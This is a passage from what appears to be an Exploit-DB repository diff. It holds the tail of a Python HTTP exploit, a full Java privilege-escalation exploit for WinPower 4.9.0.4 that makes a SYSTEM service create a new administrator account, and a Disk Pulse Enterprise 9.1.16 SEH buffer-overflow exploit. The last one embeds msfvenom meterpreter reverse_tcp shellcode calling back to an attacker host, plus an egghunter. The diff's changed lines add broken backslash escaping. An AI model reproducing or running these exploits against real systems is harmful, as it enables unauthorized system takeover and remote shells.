'\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x35\x0d\x0a\x41\x63\x63\x65\x70\x74\x2d\x45'
'\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x20\x67\x7a\x69\x70\x2c\x64\x65\x66\x6c\x61'
'\x74\x65\x0d\x0a\x41\x63\x63\x65\x70\x74\x2d\x43\x68\x61\x72\x73\x65\x74\x3a'
'\x20\x49\x53\x4f\x2d\x38\x38\x35\x39\x2d\x31\x2c\x75\x74\x66\x2d\x38\x3b\x71'
'\x3d\x30\x2e\x37\x2c\x2a\x3b\x71\x3d\x30\x2e\x37\x0d\x0a\x4b\x65\x65\x70\x2d'
'\x41\x6c\x69\x76\x65\x3a\x20\x33\x30\x30\x0d\x0a\x43\x6f\x6e\x6e\x65\x63\x74'
'\x69\x6f\x6e\x3a\x20\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x0d\x0a\x0d\x0a'
)
s.send(payload)
s.close
print 'BOOM! \n'

157
platforms/windows/local/40848.java Executable file
View file

@ -0,0 +1,157 @@
# Exploit Title: WinPower V4.9.0.4 Privilege Escalation
# Date: 29-11-2016
# Software Link: http://www.ups-software-download.com/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: local
1. Description
UPSmonitor runs as SYSTEM process.
We can communicate with monitor using RMI interface.
In manager app theres an Administrator password check, but the password isnt verified inside monitor process.
So we can modify any application settings without knowing administrator password.
What is more interesting we can set command which will be executed when monitor get remote shutdown command.
Because monitor runs as SYSTEM process, this command is also executed with SYSTEM privileges.
So using this we can create new administrator account.
http://security.szurek.pl/winpower-v4904-privilege-escalation.html
2. Proof of Concept
/*
WinPower V4.9.0.4 Privilege Escalation
Download: http://www.ups-software-download.com/
by Kacper Szurek
http://security.szurek.pl/
*/
import com.adventnet.snmp.snmp2.*;
import java.io.*;
import wprmi.SimpleRMIInterface;
public class WinPowerExploit {
private static String command_path = System.getProperty("user.dir") + "\\command.bat";
private static String command_username = "wpexploit";
private static void send_snmp_packet(String IP, SnmpPDU sendPDU) throws SnmpException {
SnmpAPI api = new SnmpAPI();
api.setCharacterEncoding("UTF-8");
api.start();
SnmpSession session = new SnmpSession(api);
session.open();
session.setPeername(IP);
session.setRemotePort(2199);
session.send(sendPDU);
}
public static void sendShutdownCommand(String agentIP) throws SnmpException {
SnmpPDU pdu2 = new SnmpPDU();
pdu2.setCommand((byte) -92);
SnmpOID oid = new SnmpOID(".1.3.6.1.2.1.33.1.6.3.25.0");
pdu2.setEnterprise(oid);
byte dataType = 4;
SnmpVar var = SnmpVar.createVariable("", dataType);
SnmpVarBind varbind = new SnmpVarBind(oid, var);
pdu2.addVariableBinding(varbind);
send_snmp_packet(agentIP, pdu2);
}
private static void create_command_file() throws IOException {
Writer writer = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(command_path), "utf-8"));
writer.write("net user " + command_username + " /add\n");
writer.write("net localgroup administrators " + command_username + " /add\n");
writer.write("net stop UPSmonitor");
writer.close();
}
private static String exec_cmd(String cmd) throws java.io.IOException {
Process proc = Runtime.getRuntime().exec(cmd);
java.io.InputStream is = proc.getInputStream();
java.util.Scanner s = new java.util.Scanner(is).useDelimiter("\\A");
String val = "";
if (s.hasNext()) {
val = s.next();
} else {
val = "";
}
return val;
}
private static boolean is_user_exist() throws IOException {
String output = exec_cmd("net user");
return output.contains(command_username);
}
public static void main(String[] args) {
try {
System.out.println("WinPower V4.9.0.4 Privilege Escalation");
System.out.println("by Kacper Szurek");
System.out.println("http://security.szurek.pl/");
String is_service_started = exec_cmd("sc query UPSmonitor");
if (!is_service_started.contains("RUNNING")) {
System.out.println("[-] Monitor service not running");
System.exit(0);
}
create_command_file();
System.out.println("[*] Create shutdown command: " + command_path);
wprmi.SimpleRMIInterface myServerObject = (SimpleRMIInterface) java.rmi.Naming.lookup("rmi://127.0.0.1:2099/SimpleRMIImpl");
String root_password = myServerObject.getDataString(29, 1304, -1, 0);
System.out.println("[+] Get root password: " + root_password);
System.out.println("[+] Enable running command on shutdown");
myServerObject.setData(29, 262, 1, "", -1L, 0);
System.out.println("[+] Set shutdown command path");
myServerObject.setData(29, 235, -1, command_path, -1L, 0);
System.out.println("[+] Set execution as SYSTEM");
myServerObject.setData(29, 203, 0, "", -1L, 0);
System.out.println("[+] Allow remote shutdown");
myServerObject.setData(29, 263, 1, "", -1L, 0);
System.out.println("[+] Add localhost as remote shutdown agent");
myServerObject.setData(29, 299, -1, "127.0.0.1 ", -1L, 0);
System.out.println("[+] Set delay to 999");
myServerObject.setData(29, 236, 999, "", -1L, 0);
System.out.println("[+] Send shutdown command");
sendShutdownCommand("127.0.0.1");
System.out.print("[+] Waiting for admin account creation");
int i = 0;
while (i < 15) {
if (is_user_exist()) {
System.out.println("\n[+] Account created, now login as: " + command_username);
System.exit(0);
break;
} else {
System.out.print(".");
Thread.sleep(2000);
}
i += 1;
}
System.out.print("\n[-] Exploit failed, admin account not created");
System.exit(1);
} catch (Exception e) {
System.out.println("\n[-] Error: " + e.getMessage());
}
}
}
Compiled Exploit:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40848.class

114
platforms/windows/remote/40835.py
View file

@ -1,14 +1,14 @@
#!/usr/bin/python
print "Disk Pulse Enterprise 9.1.16 Login Buffer Overflow"
print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"
print \"Disk Pulse Enterprise 9.1.16 Login Buffer Overflow\"
print \"Author: Tulpa / tulpa[at]tulpa-security[dot]com\"
#Author website: www.tulpa-security.com
#Author twitter: @tulpa_security
#Exploit will land you NT AUTHORITY\SYSTEM
#Exploit will land you NT AUTHORITY\\SYSTEM
#You do not need to be authenticated, password below is garbage
#Swop out IP, shellcode and remember to adjust '\x41' for bytes
#Swop out IP, shellcode and remember to adjust \'\\x41\' for bytes
#Tested on Windows 7 x86 Enterprise SP1
#Vendor has been notified on multiple occasions
@ -20,81 +20,81 @@ import socket
import sys
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.123.130',80))
connect=s.connect((\'192.168.123.130\',80))
#bad chars \x00\x0a\x0d\x26
#bad chars \\x00\\x0a\\x0d\\x26
#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b \'\\x00\\x0a\\x0d\\x26\' -f python --smallest
#payload size 308
buf = ""
buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33"
buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab"
buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d"
buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd"
buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a"
buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e"
buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb"
buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab"
buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85"
buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84"
buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e"
buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34"
buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2"
buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a"
buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0"
buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25"
buf += "\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3"
buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9"
buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e"
buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38"
buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4"
buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92"
buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55"
buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde"
buf = \"\"
buf += \"\\xdb\\xdc\\xb8\\x95\\x49\\x89\\x1d\\xd9\\x74\\x24\\xf4\\x5f\\x33\"
buf += \"\\xc9\\xb1\\x47\\x31\\x47\\x18\\x83\\xc7\\x04\\x03\\x47\\x81\\xab\"
buf += \"\\x7c\\xe1\\x41\\xa9\\x7f\\x1a\\x91\\xce\\xf6\\xff\\xa0\\xce\\x6d\"
buf += \"\\x8b\\x92\\xfe\\xe6\\xd9\\x1e\\x74\\xaa\\xc9\\x95\\xf8\\x63\\xfd\"
buf += \"\\x1e\\xb6\\x55\\x30\\x9f\\xeb\\xa6\\x53\\x23\\xf6\\xfa\\xb3\\x1a\"
buf += \"\\x39\\x0f\\xb5\\x5b\\x24\\xe2\\xe7\\x34\\x22\\x51\\x18\\x31\\x7e\"
buf += \"\\x6a\\x93\\x09\\x6e\\xea\\x40\\xd9\\x91\\xdb\\xd6\\x52\\xc8\\xfb\"
buf += \"\\xd9\\xb7\\x60\\xb2\\xc1\\xd4\\x4d\\x0c\\x79\\x2e\\x39\\x8f\\xab\"
buf += \"\\x7f\\xc2\\x3c\\x92\\xb0\\x31\\x3c\\xd2\\x76\\xaa\\x4b\\x2a\\x85\"
buf += \"\\x57\\x4c\\xe9\\xf4\\x83\\xd9\\xea\\x5e\\x47\\x79\\xd7\\x5f\\x84\"
buf += \"\\x1c\\x9c\\x53\\x61\\x6a\\xfa\\x77\\x74\\xbf\\x70\\x83\\xfd\\x3e\"
buf += \"\\x57\\x02\\x45\\x65\\x73\\x4f\\x1d\\x04\\x22\\x35\\xf0\\x39\\x34\"
buf += \"\\x96\\xad\\x9f\\x3e\\x3a\\xb9\\xad\\x1c\\x52\\x0e\\x9c\\x9e\\xa2\"
buf += \"\\x18\\x97\\xed\\x90\\x87\\x03\\x7a\\x98\\x40\\x8a\\x7d\\xdf\\x7a\"
buf += \"\\x6a\\x11\\x1e\\x85\\x8b\\x3b\\xe4\\xd1\\xdb\\x53\\xcd\\x59\\xb0\"
buf += \"\\xa3\\xf2\\x8f\\x2d\\xa1\\x64\\xf0\\x1a\\xd2\\xf2\\x98\\x58\\x25\"
buf += \"\\xeb\\x04\\xd4\\xc3\\x5b\\xe5\\xb6\\x5b\\x1b\\x55\\x77\\x0c\\xf3\"
buf += \"\\xbf\\x78\\x73\\xe3\\xbf\\x52\\x1c\\x89\\x2f\\x0b\\x74\\x25\\xc9\"
buf += \"\\x16\\x0e\\xd4\\x16\\x8d\\x6a\\xd6\\x9d\\x22\\x8a\\x98\\x55\\x4e\"
buf += \"\\x98\\x4c\\x96\\x05\\xc2\\xda\\xa9\\xb3\\x69\\xe2\\x3f\\x38\\x38\"
buf += \"\\xb5\\xd7\\x42\\x1d\\xf1\\x77\\xbc\\x48\\x8a\\xbe\\x28\\x33\\xe4\"
buf += \"\\xbe\\xbc\\xb3\\xf4\\xe8\\xd6\\xb3\\x9c\\x4c\\x83\\xe7\\xb9\\x92\"
buf += \"\\x1e\\x94\\x12\\x07\\xa1\\xcd\\xc7\\x80\\xc9\\xf3\\x3e\\xe6\\x55\"
buf += \"\\x0b\\x15\\xf6\\xaa\\xda\\x53\\x8c\\xc2\\xde\"
#pop pop ret 10015BFE
nseh = "\x90\x90\xEB\x0B"
seh = "\xFE\x5B\x01\x10"
nseh = \"\\x90\\x90\\xEB\\x0B\"
seh = \"\\xFE\\x5B\\x01\\x10\"
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
egghunter = \"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\"
egghunter += \"\\xef\\xb8\\x77\\x30\\x30\\x74\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\"
evil = "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.123.132\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=admin"
evil += "&password=aaaaa\r\n"
evil += "\x41" * 13664 #subtract/add for payload
evil += "B" * 100
evil += "w00tw00t"
evil = \"POST /login HTTP/1.1\\r\\n\"
evil += \"Host: 192.168.123.132\\r\\n\"
evil += \"User-Agent: Mozilla/5.0\\r\\n\"
evil += \"Connection: close\\r\\n\"
evil += \"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n\"
evil += \"Accept-Language: en-us,en;q=0.5\\r\\n\"
evil += \"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\\r\\n\"
evil += \"Keep-Alive: 300\\r\\n\"
evil += \"Proxy-Connection: keep-alive\\r\\n\"
evil += \"Content-Type: application/x-www-form-urlencoded\\r\\n\"
evil += \"Content-Length: 17000\\r\\n\\r\\n\"
evil += \"username=admin\"
evil += \"&password=aaaaa\\r\\n\"
evil += \"\\x41\" * 13664 #subtract/add for payload
evil += \"B\" * 100
evil += \"w00tw00t\"
evil += buf
evil += "\x90" * 212
evil += \"\\x90\" * 212
evil += nseh
evil += seh
evil += "\x90" * 10
evil += \"\\x90\" * 10
evil += egghunter
evil += "\x90" * 8672
evil += \"\\x90\" * 8672
print 'Sending evil buffer...'
print \'Sending evil buffer...\'
s.send(evil)
print 'Payload Sent!'
print \'Payload Sent!\'
s.close()